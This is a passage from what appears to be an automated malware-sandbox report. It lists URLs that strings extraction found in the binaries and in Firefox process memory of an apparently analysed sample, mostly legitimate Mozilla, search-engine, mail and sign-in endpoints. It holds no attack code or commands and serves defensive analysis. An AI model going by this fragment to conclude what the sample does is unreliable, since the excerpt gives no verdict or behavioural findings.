Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001B.00000002.2734125620.000001C166828000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accoun.google.com/v3/signin/challeng
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001B.00000002.2778559508.000001C174DCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001B.00000003.2678449963.000001C178039000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org_migrateXULStoreForDocumentdevice-connected-notificationbrowser.handlers.m
Source: firefox.exe, 0000001B.00000002.2780914101.000001C174EE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2780914101.000001C174E6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etpUsing
Source: firefox.exe, 0000001B.00000002.2749174259.000001C171978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2733122243.000001C164C11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C178039000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 0000001B.00000002.2736051759.000001C1703AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723930872.00000154760CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: firefox.exe, 0000001B.00000002.2736051759.000001C1703AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723930872.00000154760CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 0000001B.00000002.2749174259.000001C171978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C17191A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Required
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2762165135.000001C1731A0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597108445.000001C17481F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597604309.000001C17485A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597314679.000001C17483C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2596897657.000001C174600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001B.00000002.2778559508.000001C174DA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 0000001B.00000002.2778559508.000001C174DA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: firefox.exe, 0000001B.00000002.2736051759.000001C1703AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723930872.00000154760CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: firefox.exe, 0000001B.00000002.2736051759.000001C1703AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723930872.00000154760CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001B.00000003.2674078299.000001C17CD4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsUsi
Source: firefox.exe, 0000001B.00000002.2736994657.000001C1704A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 0000001B.00000003.2674078299.000001C17CD4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: 1171a5b648.exe, 0000000A.00000003.2488093515.0000000004E2B000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000000A.00000002.2529289944.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001C.00000002.2604375299.0000000000EAC000.00000008.00000001.01000000.00000013.sdmp, 1171a5b648.exe, 0000001F.00000003.2632031246.0000000004EFB000.00000004.00001000.00020000.00000000.sdmp, 1171a5b648.exe, 0000001F.00000002.2685024844.000000000011C000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: firefox.exe, 0000001B.00000002.2749174259.000001C171978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001B.00000003.2598025300.000001C174877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2762165135.000001C1731A0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597108445.000001C17481F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597604309.000001C17485A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597314679.000001C17483C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2764741953.000001C1745F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2596897657.000001C174600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2762165135.000001C1731A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001B.00000003.2599955209.000001C172133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2755914976.000001C172139000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C17268F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sFirst
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001B.00000003.2599955209.000001C172133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2755914976.000001C172139000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C17268F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%shttps://outlook.live.com/default.aspx?rru=compose&
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B797012000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000003.2683990291.000001C175A58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2683314621.000001C175A4A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001B.00000002.2773435274.000001C174730000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsPleas
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1MOZ_GOOGLE_LOCATION_SERVICE_API_KEY
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1MOZ_GOOGLE_LOCATION_SERVICE_API_KEYParent
Source: firefox.exe, 0000001B.00000002.2749174259.000001C171944000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2733122243.000001C164C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171937000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B797012000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000020.00000002.2722359273.000002B79702F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
